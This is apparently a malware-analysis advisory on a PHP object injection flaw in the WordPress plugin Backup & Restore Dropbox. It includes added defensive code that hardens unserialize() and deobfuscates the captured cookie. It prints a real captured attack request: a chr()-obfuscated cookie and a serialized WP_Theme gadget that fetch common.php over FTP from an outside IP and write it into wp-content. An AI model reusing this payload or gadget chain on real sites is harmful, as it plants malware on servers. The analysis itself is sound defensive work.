common.php (Object Injection Vulnerability in Backup & Restore Dropbox)

The WordPress plugin Backup & Restore Dropbox has a PHP object injection vulnerability. It allows malware to be downloaded remotely to the server. We found it downloading the common.php malware to the server via FTP.

dropbox-backup.php

In the plugin file /wp-content/plugins/dropbox-backup/dropbox-backup.php the function wpadm_full_backup_dropbox_run() gets registered to run during init (so it runs whenever WordPress loads):

add_action('init', 'wpadm_full_backup_dropbox_run');

That function then causes the function wpadm_run() to run:

function wpadm_full_backup_dropbox_run()
{
	wpadm_run('dropbox-backup', dirname(__FILE__));
}

wpadm.php

When that function runs, if a POST input “dropbox-backup_request” is included with the request to the website, it passes that input to the function wpadm_unpack() (in the file /wp-content/plugins/dropbox-backup/functions/wpadm.php):

function wpadm_run($pl, $dir) {
	// ...
	$params = wpadm_unpack($_POST[$request_name]);
	// ...
}

That in turn runs the POST input “dropbox-backup_request” through unserialize(), which makes PHP object injection possible:

function wpadm_unpack( $str ) {
	return unserialize( base64_decode( $str ) );
}
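For comparison, the following is an added example (not the plugin's own code) of how the same unpack step can be hardened: the base64 parameter is checked for serialized object tokens before anything is decoded, unserialize() is called with allowed_classes disabled, and the result is rejected unless it is a plain array. The function names other than wpadm_unpack() and the DemoGadget class are assumptions made for this example; the inputs are constructed, not the captured payload.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// plugin's wpadm_unpack() plus a pre-check that flags serialized objects in
// the base64 request parameter. All function names except wpadm_unpack()
// are assumed for this example.

declare(strict_types=1);

/**
 * True when the base64 parameter, once decoded, contains a serialized object
 * token (O:<len>:"<class>":<n>:{ or the C: custom-serialization form).
 * Plain arrays of scalars, which is all the plugin needs, never contain one.
 * A string value that happens to contain such a token is also rejected,
 * which is acceptable for this request format.
 */
function wpadm_request_has_object(string $b64): bool
{
    $raw = base64_decode($b64, true);
    if ($raw === false) {
        return false; // not base64 at all; the caller rejects it anyway
    }
    return (bool) preg_match('/(?:^|[;{])[OC]:\d+:"[^"]+":\d+:\{/', $raw);
}

/** Recursively true if a decoded value holds any object. */
function wpadm_contains_object($value): bool
{
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $v) {
            if (wpadm_contains_object($v)) {
                return true;
            }
        }
    }
    return false;
}

/**
 * Drop-in replacement for wpadm_unpack(). allowed_classes => false (PHP 7.0+)
 * turns every object into __PHP_Incomplete_Class, so no __wakeup() or
 * __destruct() of a real class can run; the result is then rejected unless
 * it is a plain array with no objects in it.
 */
function wpadm_unpack_hardened(string $b64): ?array
{
    if (wpadm_request_has_object($b64)) {
        return null; // worth logging: a legitimate client never sends objects
    }
    $raw = base64_decode($b64, true);
    if ($raw === false) {
        return null;
    }
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data) || wpadm_contains_object($data)) {
        return null;
    }
    return $data;
}

// Constructed inputs: a benign request and a stand-in object playing the role
// of the WP_Theme gadget seen in the captured payload.
class DemoGadget
{
    public $theme_root = 'ftp:/';
    public $stylesheet = 'example';
}
$benign    = base64_encode(serialize(['method' => 'full_backup', 'params' => ['a' => 1]]));
$malicious = base64_encode(serialize(['method' => new DemoGadget()]));

var_dump(wpadm_request_has_object($benign));    // benign request
var_dump(wpadm_request_has_object($malicious)); // request carrying an object
var_dump(wpadm_unpack_hardened($benign));       // accepted and decoded
var_dump(wpadm_unpack_hardened($malicious));    // rejected before unserialize()
```

The pre-check is what makes the request easy to alert on: a backup request is an array of scalars, so any O: or C: token in the decoded body is a reliable signal for the web application firewall or the application log, independent of whether the unserialize() call itself is patched.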

Real Post Payload

--5232150d-B--
POST / HTTP/1.1
Accept-Encoding: identity
Content-Length: 791
Host: malware.expert
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36
Connection: close
Cookie: cmd=echo%208a44d571857dd91b3fca6d302776b2ea; code=%24str%3Dfile_get_coNteNts%28chr%28102%29.chr%28116%29.chr%28112%29.chr%2858%29.chr%2847%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%28121%29.chr%28109%29.chr%28111%29.chr%28117%29.chr%28115%29.chr%2858%29.chr%2849%29.chr%2850%29.chr%2851%29.chr%2864%29.chr%2853%29.chr%2852%29.chr%2846%29.chr%2849%29.chr%2853%29.chr%2851%29.chr%2846%29.chr%2852%29.chr%2854%29.chr%2846%29.chr%2856%29.chr%2853%29.chr%2858%29.chr%2856%29.chr%2848%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%2844%29.chr%2847%29.chr%28116%29.chr%28101%29.chr%28115%29.chr%28116%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%29%3B+file_put_coNteNts%28ABSPATH.chr%2847%29.chr%28119%29.chr%28112%29.chr%2845%29.chr%2899%29.chr%28111%29.chr%28110%29.chr%28116%29.chr%28101%29.chr%28110%29.chr%28116%29.chr%2847%29.chr%2899%29.chr%28111%29.chr%28109%29.chr%28109%29.chr%28111%29.chr%28110%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%2C%24str%29%3B+die%28%29%3B;

Content-Type: application/x-www-form-urlencoded

--5232150d-C--
dropbox-backup_request=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

The code cookie, once URL-decoded and its chr() calls resolved, first calls file_get_contents() to download the common.php malware over FTP, then file_put_contents() writes it to ABSPATH . "/wp-content/common.php" on the server.
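The chr()-obfuscated cookie above can be read without running it. The following is an added example (not code from the original post) that extracts the code cookie from a logged Cookie header, rewrites each chr(N).chr(N)... run into a quoted literal, and lists the URLs the decoded code contains. It runs on a constructed cookie with short stand-in values ("ftp://example" and "/x.php") rather than the captured one, and all function names are assumed for this example.

```php
<?php
// Added example, not code from the original post: reads the "code" cookie
// out of a logged Cookie header and rewrites its chr(N).chr(N)... runs into
// plain strings so the FTP source and the file written can be read without
// executing anything. All function names are assumed for this example.

declare(strict_types=1);

/** Returns the URL-decoded value of one cookie from a raw Cookie header, or null. */
function cookie_value(string $cookieHeader, string $wanted): ?string
{
    foreach (explode(';', $cookieHeader) as $part) {
        [$name, $value] = array_pad(explode('=', trim($part), 2), 2, '');
        if ($name === $wanted) {
            return urldecode($value);
        }
    }
    return null;
}

/**
 * Replaces every run of chr(N).chr(N)... with a double-quoted literal of the
 * characters it builds. Only decimal chr() calls are handled, which is all the
 * captured cookie uses; the code is never evaluated.
 */
function deobfuscate_chr_runs(string $code): string
{
    $run = '/chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*/i';
    return preg_replace_callback($run, static function (array $m): string {
        preg_match_all('/\d+/', $m[0], $nums);
        $decoded = implode('', array_map(fn(string $n): string => chr((int) $n), $nums[0]));
        return '"' . addcslashes($decoded, "\"\\\$") . '"';
    }, $code);
}

/** Pulls URL-shaped indicators (http, https, ftp) out of decoded code. */
function extract_urls(string $code): array
{
    preg_match_all('#\b(?:https?|ftp)://[^\s"\')]+#i', $code, $m);
    return $m[0];
}

// Constructed sample: same shape as the logged cookie, with short stand-in
// values ("ftp://example" and "/x.php") instead of the real ones.
$obfuscated = '$str=file_get_coNteNts('
    . 'chr(102).chr(116).chr(112).chr(58).chr(47).chr(47).chr(101).chr(120).chr(97).chr(109).chr(112).chr(108).chr(101)'
    . '); file_put_coNteNts(ABSPATH.'
    . 'chr(47).chr(120).chr(46).chr(112).chr(104).chr(112)'
    . ',$str); die();';
$cookieHeader = 'cmd=echo%20test; code=' . urlencode($obfuscated) . ';';

$decoded = deobfuscate_chr_runs((string) cookie_value($cookieHeader, 'code'));
echo $decoded, PHP_EOL;   // readable PHP with the strings restored
print_r(extract_urls($decoded)); // indicators to block or hunt for
```

To apply it to the real log, pass the Cookie header line from the request above as $cookieHeader; the FTP URL and the destination path then appear as plain strings, which is what you need for blocking the source and for searching other sites for the same written file.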

dropbox-backup_request decoded

Array
(
    [method] => __PHP_Incomplete_Class Object
        (
            [__PHP_Incomplete_Class_Name] => WP_Theme
            [headers:WP_Theme:private] => Array
                (
                    [Name] => 1 name here
                    [TextDomain] => en_US
                    [DomainPath] => ,
                )

            [theme_root:WP_Theme:private] => ftp:/
            [stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
            [cache] => Array
                (
                )

        )

    [params] => __PHP_Incomplete_Class Object
        (
            [__PHP_Incomplete_Class_Name] => WP_Theme
            [headers:WP_Theme:private] => Array
                (
                    [Name] => 1 name here
                    [TextDomain] => en_US
                    [DomainPath] => ,
                )

            [theme_root:WP_Theme:private] => ftp:/
            [stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
            [cache] => Array
                (
                )

        )

)

Use Malware Expert Signatures to detect this malware in PHP files and clean them up.
